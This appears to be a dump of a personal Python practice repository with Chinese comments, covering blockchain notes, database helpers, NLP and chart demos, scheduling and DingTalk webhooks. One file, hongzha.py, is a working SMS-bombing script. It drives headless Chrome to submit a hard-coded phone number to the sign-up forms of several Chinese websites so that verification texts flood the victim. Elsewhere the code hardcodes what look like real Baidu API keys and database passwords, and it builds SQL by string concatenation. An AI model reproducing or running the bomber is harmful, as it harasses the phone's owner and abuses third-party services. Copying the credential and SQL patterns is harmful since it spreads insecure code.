"amount": 1, 252 | "recipient": "6cbb4b7f8738471b9c33b0db0bddf8d8", 253 | "sender": "0" 254 | } 255 | ] 256 | } 257 | ], 258 | "length": 3 259 | } 260 | 261 | 12. 在第三个窗口(5003)中,模拟挖出一个区块,即 http://192.168.2.111:5003/mine GET方式 发送一次请求。 262 | 在访问http://192.168.2.111:5003/chain,得到结果如下: 263 | { 264 | "chain": [ 265 | { 266 | "index": 1, 267 | "previous_hash": "1", 268 | "proof": 100, 269 | "timestamp": 1524636812.4287012, 270 | "transactions": [] 271 | }, 272 | { 273 | "index": 2, 274 | "previous_hash": "257905fe9635c5c301ab08e43a6fb7d35302714d2632ab544731fa68556dac1e", 275 | "proof": 35293, 276 | "timestamp": 1524636819.811855, 277 | "transactions": [ 278 | { 279 | "amount": 1, 280 | "recipient": "5743e8ae7f744261a5d394b67d9b528e", 281 | "sender": "0" 282 | } 283 | ] 284 | } 285 | ], 286 | "length": 2 287 | } 288 | 289 | 13. 此时,5001端口挖到三个区块,5002端口挖到两个区块,5003端口挖到一个区块。 290 | 即节点5001对应的区块链是最长的链,节点5002对应的区块链次之,节点5003对应的区块链最短。 291 | 将三个节点进行注册,添加到节点nodes = set()中。 292 | 在第一个窗口(5001),访问连接 http://192.168.2.111:5001/nodes/register POST方式,注册当前的节点,结果如下: 293 | { 294 | "message": "New nodes have been added", 295 | "total_nodes": [ 296 | "192.168.2.111:5003", 297 | "192.168.2.111:5002", 298 | "192.168.2.111:5001" 299 | ] 300 | } 301 | 在第二个窗口(5002),访问连接 http://192.168.2.111:5002/nodes/register POST方式,注册当前的节点,结果如下: 302 | { 303 | "message": "New nodes have been added", 304 | "total_nodes": [ 305 | "192.168.2.111:5001", 306 | "192.168.2.111:5002", 307 | "192.168.2.111:5003" 308 | ] 309 | } 310 | 在第三个窗口(5003),访问连接 http://192.168.2.111:5003/nodes/register POST方式,注册当前的节点,结果如下: 311 | { 312 | "message": "New nodes have been added", 313 | "total_nodes": [ 314 | "192.168.2.111:5003", 315 | "192.168.2.111:5001", 316 | "192.168.2.111:5002" 317 | ] 318 | } 319 | 320 | 14. 验证共识算发,用最长的区块链替换短的链,操作如下: 321 | 在第二个窗口(5002),访问连接 http://192.168.2.111:5002/nodes/resolve GET方式,检查当前的节点,结果如下: 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 注: 331 | 1. 在交易的模拟过程中,设定的交易信息静态消息,主要内容为: 332 | { 333 | "amount": 5, 334 | "recipient": "456", 335 | "sender": "123" 336 | } 337 | 包括:交易的数量、发送方、接收方。 338 | 所以在区块链的区块中,交易内容相同。 339 | 在request.get_json()中,无接受数据,此点尚且作为遗留问题。 340 | 341 | 2. 在模拟挖矿的过程中,前一个区块的工作量证明last_proof,与本区块的工作量证明proof,共同组成的字符串的hash值hash(last_proof proof), 342 | 以其是否以四个零开头,作为是否为合格区块的标志。即valid_proof()函数的作用。 343 | 此处慎重调整开头零的个数,当添加两个零,即判定是否以六个零作为开头时,计算的工作量证明为49259370(四个零开头为35089),工作量提升了1403.84倍。 344 | 345 | -------------------------------------------------------------------------------- /data_process/db_operation.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 数据库相关操作 6 | -------------------------------------- 7 | @File : db_operation.py 8 | @Time : 2018/8/25 12:28 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import re 17 | import traceback 18 | import json 19 | from pymongo import MongoClient 20 | import pymysql 21 | import csv 22 | import cx_Oracle 23 | 24 | class trans(): 25 | def __init__(self): 26 | self.jsonPath = "json2mongo.json" 27 | self.mysqlPath = "csv2mysql.csv" 28 | self.oraclePath = "csv2oracle.csv" 29 | self.mongodb_localhost = "mongodb://localhost:27017" # 修改的host为locaohost,或具体的连接地址(在MongoDB安装目录bin下,输入cmd,输入mongo查看具体的连接信息) 30 | self.mysql_localhost = pymysql.connect( 31 | host = 'localhost', 32 | port = 3306, 33 | user = 'root', 34 | passwd = '123456789', 35 | db = 'demo', 36 | charset = 'utf8' # utf8 not utf-8 37 | ) 38 | self.oracle_localhost = cx_Oracle.connect('scott/123456789@localhost:1521/orcl') # 链接信息:localhost:1521/orcl,在数据库中右键属性,查看链接详细信息 39 | 40 | def json2mongodb(self): 41 | print("begin process json...") 42 | try: 43 | # 1. 连接MongoDB 44 | conn = MongoClient(self.mongodb_localhost) 45 | db = conn.demo # 连接数据库demo,没有自动创建 46 | demo_json = db.demo_json # 使用demo_json集合,没有自动创建 47 | 48 | # 2. 插入数据 49 | # demo_json.insert([{"name":"lxj", "age":"18"}, {"sex":"man"}]) 50 | 51 | # 3. 查找数据 52 | # one_json = demo_json.find_one({"name":"lxj"}) 53 | 54 | # obj = demo_json.find_one() 55 | # obj_id = obj["_id"] # ObjectId类型,直接根据ObjectId用于定向查找 56 | # print(demo_json.find_one({"_id": obj_id})) 57 | 58 | # 4. 修改数据 59 | # demo_json.update_one({"name":"lxj"}, {"$set":{"age":"20"}}) 60 | 61 | # 5. 遍历数据 62 | # print(db.demo_json.count()) 63 | # for i in demo_json.find(): 64 | # print(i) 65 | 66 | # 6. 删除数据 67 | # db.demo_json.remove() # 全部删除 68 | 69 | # 7. 插入json文件 70 | # with open(self.jsonPath, "r", encoding="utf-8") as f: 71 | # jsonFile = json.load(f) 72 | # demo_json.insert(jsonFile) 73 | except: 74 | traceback.print_exception 75 | 76 | def csv2mysql(self): 77 | print("begin mysql...") 78 | try: 79 | # 1. 连接MySQL 80 | conn = self.mysql_localhost 81 | cursor = conn.cursor() 82 | # findall_sql = "select * from test" 83 | # cursor.execute(findall_sql) 84 | 85 | # 2. 查看数据 86 | # all_row = cursor.fetchall() 87 | # print(all_row) 88 | 89 | # 3. 插入数据 90 | # insert_sql = "insert into test values ('2','zz','7')" 91 | # cursor.execute(insert_sql) 92 | 93 | # 4. 修改数据 94 | # update_sql = "update test set age = '33' where name = 'aaa'" 95 | # cursor.execute(update_sql) 96 | 97 | # 5. 删除数据 98 | # delete_sql = "delete from test where age<10" 99 | # cursor.execute(delete_sql) 100 | 101 | # 6. 新建表 102 | # header = ['id', '主题', '用户ID', '用户名', '推荐力度', '评论时间', '评论标题', '评论内容'] 103 | # createTable_sqll = """ 104 | # CREATE TABLE IF NOT EXISTS`testtest` ( 105 | # `%s` INT PRIMARY KEY AUTO_INCREMENT NOT NULL, 106 | # `%s` varchar(128) DEFAULT NULL, 107 | # `%s` varchar(128) DEFAULT NULL, 108 | # `%s` varchar(128) DEFAULT NULL, 109 | # `%s` varchar(30) DEFAULT NULL, 110 | # `%s` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, 111 | # `%s` varchar(500) DEFAULT NULL, 112 | # `%s` varchar(65533) DEFAULT NULL 113 | # ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 114 | # """ % (header[0], header[1], header[2], header[3], header[4], header[5], header[6], header[7]) 115 | # cursor.execute(createTable_sqll) 116 | 117 | # 7. 写入csv文件--采用csv方式 118 | # utf-8_sig编码,去掉多余字符BOM(打开utf-8文件时开头的一个多余字符,用来声明编码信息) 119 | with open(self.mysqlPath, "r", encoding="utf-8_sig") as f: 120 | csv_reader = csv.reader(f) 121 | headers = next(csv_reader) 122 | headers[0] = "id" # 当列名为空时替换 123 | 124 | # 0. 遍历csv文件中的数据 125 | # for rows in csv_reader: 126 | # print(rows) 127 | 128 | # 1. 新建表 129 | createTable_sql = """ 130 | CREATE TABLE IF NOT EXISTS`test2` ( 131 | `%s` INT PRIMARY KEY AUTO_INCREMENT NOT NULL, 132 | `%s` varchar(128) DEFAULT NULL, 133 | `%s` varchar(128) DEFAULT NULL, 134 | `%s` varchar(128) DEFAULT NULL, 135 | `%s` varchar(30) DEFAULT NULL, 136 | `%s` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, 137 | `%s` varchar(500) DEFAULT NULL, 138 | `%s` text(65533) DEFAULT NULL, 139 | `%s` varchar(30) DEFAULT NULL, 140 | `%s` varchar(30) DEFAULT NULL, 141 | `%s` varchar(50) DEFAULT NULL 142 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 143 | """ % (headers[0], headers[1], headers[2], headers[3], headers[4], headers[5], headers[6], headers[7], headers[8], headers[9], headers[10]) 144 | # cursor.execute(createTable_sql) 145 | 146 | # 2. 插入数据--注意数据清洗 147 | for i,rows in enumerate(csv_reader): # enumerate为python内置函数,用于既要遍历索引又要遍历元素 148 | 149 | # 涉及数据清洗,对存入数据库的数据清洁度的要求较高,双引号影响数据插入 150 | name = rows[3] 151 | comment = rows[7] 152 | 153 | # 数据清洗 154 | name = name.replace("\'", "") 155 | comment = comment.replace("\"", "").replace(".,", ".").replace(",,", ",").replace("..,", "..").replace(":,", ":") 156 | 157 | insert_sql = """INSERT INTO test2 VALUES ( %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s )""" % (rows[0], "'" + rows[1] + "'", "'" + rows[2] + "'", "'" + name + "'", "'" + rows[4] + "'", "'" + rows[5] + "'", "'" + rows[6] + "'", "'" + comment + "'", "'" + rows[8] + "'", "'" + rows[9] + "'", "'" + rows[10] + "'") 158 | # cursor.execute(insert_sql) # 插入数据 159 | 160 | conn.commit() # 提交 161 | cursor.close() 162 | conn.close() 163 | except: 164 | conn.rollback() # 发生错误则全部回滚 165 | traceback.print_exception 166 | 167 | def csv2oracle(self): 168 | print("connect to oracle...") 169 | try: 170 | # 1. 链接Oracle数据库 171 | conn = self.oracle_localhost 172 | cursor = conn.cursor() 173 | 174 | # 2. 查询数据 175 | sql = "select * from EMP" 176 | cursor.execute(sql) 177 | allData = cursor.fetchall() # cursor.fetchone() 178 | for data in allData: 179 | print(data) 180 | 181 | # # 3. 插入、更新、删除 主要区别在于sql不同 182 | # def sqlDML(sql, conn): 183 | # cursor = conn.cursor() 184 | # cursor.execute(sql) 185 | # cursor.close() 186 | # conn.commit() 187 | 188 | conn.commit() 189 | cursor.close() 190 | conn.close() 191 | except: 192 | conn.rollback() 193 | traceback.print_exception 194 | 195 | trans = trans() 196 | # trans.json2mongodb() 197 | # trans.csv2mysql() 198 | # trans.csv2oracle() 199 | -------------------------------------------------------------------------------- /data_process/divide_words.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : HanLP, baiduNLP, jieba分词对比 6 | -------------------------------------- 7 | @File : divide_words.py 8 | @Time : 2018/8/25 22:10 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | # import hanlp 17 | from aip import AipNlp 18 | from jieba import * 19 | 20 | class baidu_nlp: 21 | def __init__(self): 22 | self.APP_ID = "020e0df2b55441d9b90861ea2b457ddf" 23 | self.API_KEY = "51fa55f6feb94a0fb7d4de49f111d6c2" 24 | self.SECRET_KEY = "129ba31afdaa439da5cf9ab0cd07d8f4" 25 | self.client = AipNlp(self.APP_ID, self.API_KEY, self.SECRET_KEY) 26 | 27 | def cifa(self, text): 28 | cifa = self.client.lexer(text) 29 | print(cifa) 30 | 31 | class jieba: 32 | pass 33 | 34 | 35 | if __name__ == '__main__': 36 | text = "你好,欢迎在Python中使用百度NLP" 37 | baidu_nlp = baidu_nlp() 38 | baidu_nlp.cifa(text) 39 | 40 | # print(HanLP.segment("你好,欢迎在Python中调用HanLP的API")) 41 | # 42 | # testCase = [ 43 | # "商品和服务", 44 | # "结婚的和尚未结婚的确实在干扰分词啊", 45 | # "买水果然后来世博园最后去世博会", 46 | # "中国的首都是北京", 47 | # "欢迎新老师生前来就餐", 48 | # "工信处女干事每月经过下属科室都要亲口交代24口交换机等技术性器件的安装工作", 49 | # "随着页游兴起到现在的页游繁盛,依赖于存档进行逻辑判断的设计减少了,但这块也不能完全忽略掉。"] 50 | # for sentence in testCase: 51 | # print(HanLP.segment(sentence)) 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /data_process/pandas_operation.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/8/27 20:20 8 | @File : pandas_operation.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import pandas as pd 16 | import numpy as np 17 | from copy import deepcopy 18 | 19 | ## 1. read_cvs 20 | # 当读取的数据量很大时,请尝试添加这个参数:nrows 21 | pd.read_csv(nrows=5) 22 | # dtype 声明列的类型 23 | df = pd.DataFrame(dtype={'col1': str, 'c2': int}) 24 | 25 | 26 | ## 2. select_dtypes 在读取表之后,每个列的默认数据类型可以是bool、int64、float64、object、category、timedelta64或datetime64。 27 | df.select_dtypes(include=['float64', 'int64']) 28 | 29 | 30 | ## 3. copy 复制 df 31 | df1 = pd.DataFrame({'a': [0, 0, 0], 'b': [1, 1, 1]}) 32 | df2 = df1 33 | df2['a'] = df2['a'] + 1 34 | df1.head() 35 | 36 | # df2 = df1不是复制df1并将其赋值给df2,而是设置一个指向df1的指针。所以df2的任何变化都会导致df1的变化 37 | df2 = df1.copy() 38 | # 或者 39 | df3 = deepcopy(df1) 40 | 41 | 42 | ## 4. map 43 | # 数据转换。keys 是旧值,values 是新值 44 | level_map = {1: 'high', 2: 'medium', 3: 'low'} 45 | df['c_level'] = df['c'].map(level_map) 46 | 47 | 48 | ## 5. apply 49 | # 创建一个新列,其中包含其他列内容作为输入 50 | # 缺点:速度慢 51 | def rule(x, y): 52 | if x == 'high' and y > 10: 53 | return 1 54 | else: 55 | return 0 56 | 57 | df = pd.DataFrame({'c1': ['high', 'high', 'low', 'low'], 'c2': [0, 23, 17, 4]}) 58 | df['new'] = df.apply(lambda x: rule(x['c1'], x['c2']), axis=1) 59 | df.show() 60 | 61 | 62 | ## 6. value_counts 查看值分布 63 | df['col1'].value_counts() 64 | # normalize = True:如果你想查看频率而不是计数。 65 | # dropna = False:如果你还想在统计中包含缺失值。 66 | # sort = False:按值而不是按计数排序的统计结果。 67 | # df['c'].value_counts().reset_index():如果你想将stats表转换为pandas dataframe并对其进行操作。 68 | 69 | 70 | ## 7. 缺失值数量 71 | # .isnull() 和 .sum() 来计算指定列中缺失值的数量。 72 | df = pd.DataFrame({'id': [1, 2, 3], 'c1': [0, 0, np.nan], 'c2': [np.nan, 1, 1]}) 73 | df = df[['id', 'c1', 'c2']] 74 | df['num_nulls'] = df[['c1', 'c2']].isnull().sum(axis=1) 75 | df.head() 76 | 77 | 78 | ## 8. 选择特定多个 ID 的行 79 | df_filter = df['ID'].isin(['A001', 'C022']) 80 | print(df[df_filter]) 81 | 82 | 83 | ## 9. 百分位组 将一列的值分类为几组。 84 | # 比如前5%的值分为组1,5-20%的值分为组2,20-50%的值分为组3,底部50%的值分为组4 85 | cut_points = [np.percentile(df['col'], i) for i in [50, 80, 95]] 86 | df['group'] = 1 87 | for i in range(3): 88 | df['group'] = df['group'] + (df['col'] < cut_points[i]) 89 | 90 | 91 | ## 10. to_csv 92 | # 准确地打印出写入文件的前五行 93 | print(df[:5].to_csv()) 94 | 95 | # 处理混合在一起的整数和缺失值。 96 | # 如果一个列同时包含缺失值和整数,那么数据类型仍然是float而不是int。 97 | # 导出表时,可以添加 float_format='%.0f' ,将所有浮点数化为整数。 98 | # 如果你只想要所有列的整数输出,请使用此技巧。 99 | -------------------------------------------------------------------------------- /data_process/word_cloud.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/python3 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @File : word_cloud.py 6 | @Time : 2018/8/26 0:37 7 | @Software : PyCharm 8 | -------------------------------------- 9 | @Description : 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | # WordCloud + 统计图表 17 | ''' 18 | 关键点和难点在于: 19 | 对于网上用户的评论+文字做分析,提取出关键点作为列表 20 | ''' 21 | 22 | import os 23 | from pyecharts import WordCloud 24 | from pyecharts import Bar, Pie, Line, Scatter3D 25 | from pyecharts import Page 26 | import random 27 | 28 | 29 | # 词云图 30 | def wordCloud(x, y, label): 31 | wordCloud = WordCloud(width=1300, height=620) 32 | 33 | # word_size_ragne限定字体大小范围 34 | # shape参数用来调整词云形状('circle', 'cardioid', 'diamond', 'triangle-forward', 'triangle', 'pentagon', 'star') 35 | wordCloud.add("", x, y, word_size_range=[20, 100], shape="circle") 36 | wordCloud.render() 37 | os.system(r"render.html") # 默认内容输出到根目录 38 | 39 | 40 | # 统计图表 41 | def get_charts(x, y, label, type): 42 | if type == 1: 43 | c = Pie("饼状图") 44 | elif type == 2: 45 | c = Bar3D("条形图") 46 | elif type == 3: 47 | c = Line("折线图") 48 | print(c) 49 | c.add(label, x, y, is_more_utils=True) 50 | # 打印输出图表的所有配置项 51 | c.show_config() 52 | c.render() 53 | os.system(r"render.html") 54 | 55 | 56 | # 多个统计图 57 | def get_otherCharts(page): 58 | attr = ["衬衫", "羊毛衫", "雪纺衫", "裤子", "高跟鞋", "袜子"] 59 | v1 = [5, 20, 36, 10, 75, 90] 60 | v2 = [10, 25, 8, 60, 20, 80] 61 | bar = Bar("柱状图数据堆叠示例") 62 | bar.add("商家A", attr, v1, is_stack=True) 63 | bar.add("商家B", attr, v2, is_stack=True) 64 | page.add(bar) 65 | page.render() 66 | os.system(r"render.html") 67 | 68 | 69 | # Scatter3D 70 | def get_scatter3D(page): 71 | data = [[random.randint(0, 100), random.randint(0, 100), random.randint(0, 100)] for _ in range(80)] 72 | range_color = ['#313695', '#4575b4', '#74add1', '#abd9e9', '#e0f3f8', '#ffffbf', 73 | '#fee090', '#fdae61', '#f46d43', '#d73027', '#a50026'] 74 | scatter3D = Scatter3D("3D散点示例", width=1200, height=600) 75 | scatter3D.add("", data, is_visualmap=True, visual_range_color=range_color) 76 | page.add(scatter3D) 77 | page.render() 78 | os.system(r"render.html") 79 | 80 | 81 | def main(): 82 | ''' 83 | # 测试词云图 84 | x = [ 85 | "python", "lxj", "zj", "big data", "python", "lxj", "zj", "big data", 86 | "python", "lxj", "zj", "big data", "python", "lxj", "zj", "big data" 87 | ] 88 | y = [ 89 | 10000, 8000, 6000, 3000, 10000, 8000, 6000, 3000, 90 | 10000, 8000, 6000, 3000, 10000, 8000, 6000, 3000 91 | ] 92 | label = "词云" 93 | wordCloud(x, y, label) 94 | ''' 95 | 96 | ''' 97 | # 测试统计图表 98 | x = ["衬衫", "袜子", "高跟鞋", "羊毛衫", "裤子"] 99 | y1 = [5, 10, 38, 75, 90] 100 | y2 = [15, 4, 70, 25, 190] 101 | label = "服装" 102 | type = 2 103 | get_charts(x, y, label, type) 104 | ''' 105 | 106 | ''' 107 | # 测试多个统计图 108 | page = Page() 109 | get_otherCharts(page) 110 | ''' 111 | 112 | # 测试三维散点图 113 | page = Page() 114 | get_scatter3D(page) 115 | 116 | 117 | if __name__ == "__main__": 118 | main() 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | -------------------------------------------------------------------------------- /interesting/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2020/2/9 19:01 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /interesting/apscheduler/a.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/interesting/apscheduler/a.ico -------------------------------------------------------------------------------- /interesting/apscheduler/testApscheduler.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 测试 apscheduler 6 | 使用: 7 | 1.安装pyinstaller包、pywin32包; 8 | 2.同目录下,存放xx.ico图标文件; 9 | 3.pycharm的terminal中执行打包指令: 10 | >pyinstaller -F -w -i a.ico testApscheduler.py 11 | 4.生成对应的testApscheduler.exe文件 12 | 13 | 参考链接: 14 | https://www.jianshu.com/p/4f5305e220f0 15 | https://zhuanlan.zhihu.com/p/46948464 16 | -------------------------------- 17 | @Time : 2019/5/21 10:50 18 | @File : testApscheduler.py 19 | @Software: PyCharm 20 | -------------------------------- 21 | @Author : lixj 22 | @contact : lixj_zj@163.com 23 | """ 24 | 25 | from multiprocessing import freeze_support 26 | from apscheduler.schedulers.blocking import BlockingScheduler 27 | from apscheduler.triggers.cron import CronTrigger 28 | 29 | 30 | def tick(): 31 | with open("aa.txt", "w", encoding="utf-8") as f: 32 | f.write("123456") 33 | print("write done") 34 | 35 | 36 | if __name__ == '__main__': 37 | freeze_support() # 防止多进程 38 | scheduler = BlockingScheduler() 39 | # 通过CronTrigger设置时间,防止pyinstall打包执行exe报错:No trigger by the name "cron" was found 40 | trigger = CronTrigger(hour='15', minute='55') 41 | scheduler.add_job(tick, trigger=trigger) 42 | 43 | try: 44 | scheduler.start() 45 | except (KeyboardInterrupt, SystemExit): 46 | pass 47 | -------------------------------------------------------------------------------- /interesting/dingding_push/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2020/2/9 18:34 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /interesting/dingding_push/demo.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 测试 python 推送钉钉消息 6 | -------------------------------- 7 | @Time : 2020/2/9 19:13 8 | @File : demo.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | import json 17 | import logging 18 | import pymysql 19 | 20 | # 日志文件设置 21 | logging.basicConfig(level=logging.DEBUG, # 控制台打印的日志级别 22 | filename='/app/mom/demo/run_log.log', # 指定生成日志文件的位置,否则默认在 /root 路径下生成日志文件 23 | filemode='a', ##模式,有w和a,w就是写模式,每次都会重新写日志,覆盖之前的日志 24 | # a是追加模式,默认如果不写的话,就是追加模式 25 | format= 26 | '%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s' 27 | # 日志格式 28 | ) 29 | 30 | 31 | # 链接数据库,读取数据 32 | def conn_read_data(): 33 | conn_info = pymysql.connect( 34 | host='XXXX', 35 | port=3306, 36 | user='XXXX', 37 | passwd='XXXX', 38 | db='XXXX', 39 | charset='utf8' # utf8 not utf-8 40 | ) 41 | try: 42 | cursor = conn_info.cursor() 43 | findall_sql = "select count(id) from XXXX" 44 | count = cursor.execute(findall_sql) 45 | cursor.close() 46 | conn_info.close() 47 | return count 48 | except Exception: 49 | conn_info.rollback() # 发生错误则全部回滚 50 | 51 | 52 | # 钉钉推送消息 53 | def ding_push_message(msg): 54 | # 构建请求数据 55 | message = { 56 | "msgtype": "text", 57 | "text": { 58 | "content": msg 59 | }, 60 | "at": { 61 | "isAtAll": True 62 | } 63 | } 64 | 65 | # 对请求的数据进行json封装 66 | message_json = json.dumps(message) 67 | # 发送请求 68 | info = requests.post(url=web_url, data=message_json, headers=header) 69 | # 打印返回的结果 70 | logging.info(info.text) 71 | 72 | 73 | if __name__ == "__main__": 74 | # 钉钉请求的URL,WebHook地址 75 | web_url = "https://oapi.dingtalk.com/robot/send?access_token=XXXX" 76 | 77 | # 构建请求头部 78 | header = { 79 | "Content-Type": "application/json", 80 | "Charset": "UTF-8" 81 | } 82 | 83 | # 构建请求数据 84 | msg = "【钉钉消息】目前人数共" + str(conn_read_data()) + "人。" 85 | 86 | ding_push_message(msg) 87 | -------------------------------------------------------------------------------- /interesting/dingding_push/dingding_push_msg.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 测试钉钉群机器人推送消息 6 | 安全设置是必填项,例如 7 | 自定义关键字:钉钉 8 | 钉钉发送通知时,必须包含关键字 “钉钉”,不然会报 keyword not in content。 9 | -------------------------------- 10 | @Time : 2020/2/9 18:34 11 | @File : dingding_push_msg.py 12 | @Software: PyCharm 13 | -------------------------------- 14 | @Author : lixj 15 | @contact : lixj_zj@163.com 16 | """ 17 | 18 | import requests 19 | import json 20 | 21 | 22 | def ding_push_message(): 23 | # 构建请求头部 24 | header = { 25 | "Content-Type": "application/json", 26 | "Charset": "UTF-8" 27 | } 28 | 29 | # 构建请求数据 30 | message = { 31 | "msgtype": "text", 32 | "text": { 33 | "content": msg 34 | }, 35 | "at": { 36 | "isAtAll": True 37 | } 38 | } 39 | 40 | # 对请求的数据进行json封装 41 | message_json = json.dumps(message) 42 | # 发送请求 43 | info = requests.post(url=web_url, data=message_json, headers=header) 44 | # 打印返回的结果 45 | print(info.text) 46 | 47 | 48 | if __name__ == "__main__": 49 | # 请求的URL,WebHook地址 50 | web_url = "https://oapi.dingtalk.com/robot/send?access_token=xxxx" 51 | # 构建请求数据 52 | msg = "钉钉,测试消息。。。" 53 | 54 | ding_push_message() 55 | -------------------------------------------------------------------------------- /interesting/hongzha.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 短信轰炸 6 | 1. chromedriver.exe 放入到指定的文件路径下 7 | 2. 版本对应 8 | -------------------------------------- 9 | @File : financialCalculator.py 10 | @Time : 2018/8/25 12:28 11 | @Software : PyCharm 12 | -------------------------------------- 13 | @Author : lixj 14 | @Contact : lixj_zj@163.com 15 | -------------------------------------- 16 | """ 17 | 18 | import time 19 | from selenium import webdriver 20 | from threading import Thread 21 | 22 | class hongZha(): 23 | def __init__(self): 24 | self.target_phone = "13636466080" # phone 25 | self.num = 0 # number 26 | self.chrome_options = webdriver.ChromeOptions() 27 | self.chrome_options.add_argument('--headless') 28 | self.chrome_options.add_argument('--disable-gpu') 29 | self.chrome_options.add_argument('--user-agent=Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') 30 | self.driver = webdriver.Chrome(chrome_options=self.chrome_options, executable_path='../otherfiles/chromedriver/chromedriver.exe') 31 | 32 | def send_result(self, button, name): 33 | button.click() 34 | self.num += 1 35 | print("{} 第{}次发送成功 {}".format(self.target_phone, self.num, name)) 36 | time.sleep(2) 37 | 38 | # 1. 39 | def zhihu(self, name): 40 | self.driver.get("https://www.zhihu.com/signup") 41 | self.driver.find_element_by_xpath("//button[@class='Button Button--primary Button--blue']").click() 42 | time.sleep(3) 43 | tel = self.driver.find_element_by_xpath("//input[@placeholder='手机号']") 44 | tel.send_keys(self.target_phone) 45 | button = self.driver.find_element_by_xpath("//button[@class='Button CountingDownButton SignFlow-smsInputButton Button--plain']") 46 | self.send_result(button, name) 47 | self.driver.quit() 48 | 49 | # 2. 50 | def weipinhui(self, name): 51 | self.driver.get("https://passport.vip.com/register") 52 | tel = self.driver.find_element_by_xpath("//input[@placeholder='请输入手机号码']") 53 | tel.send_keys(self.target_phone) 54 | button = self.driver.find_element_by_xpath("//a[@id='J_mobile_verifycode_btn']") 55 | self.send_result(button, name) 56 | self.driver.quit() 57 | 58 | # 3. 59 | def suning(self, name): 60 | self.driver.get("https://reg.suning.com/person.do") 61 | tel = self.driver.find_element_by_xpath("//input[@id='mobileAlias']") 62 | tel.send_keys(self.target_phone) 63 | button = self.driver.find_element_by_xpath("//a[@id='sendSmsCode']") 64 | self.send_result(button, name) 65 | self.driver.quit() 66 | 67 | # 3. 68 | def mail163(self, name): 69 | self.driver.get("http://reg.email.163.com/unireg/call.do?cmd=register.entrance&from=163mail_right") 70 | tel = self.driver.find_element_by_xpath("//input[@id='mobileIpt']") 71 | tel.send_keys(self.target_phone) 72 | button = self.driver.find_element_by_xpath("//a[@id='sendAcodeStg']") 73 | self.send_result(button, name) 74 | self.driver.quit() 75 | 76 | if __name__ == '__main__': 77 | hongZha = hongZha() 78 | 79 | zh = Thread(target=hongZha.zhihu, args=("zhihu", )) 80 | zh.start() 81 | 82 | # wph = Thread(target=hongZha.weipinhui, args=("weipinhui", )) 83 | # wph.start() 84 | 85 | # sn = Thread(target=hongZha.suning, args=("suning", )) 86 | # sn.start() 87 | 88 | # mail163 = Thread(target=hongZha.mail163, args=("mail163", )) 89 | # mail163.start() 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | -------------------------------------------------------------------------------- /other_files/chromedriver/chromedriver.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/other_files/chromedriver/chromedriver.exe -------------------------------------------------------------------------------- /practice/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/5/25 10:32 8 | @File : __init__.py.py 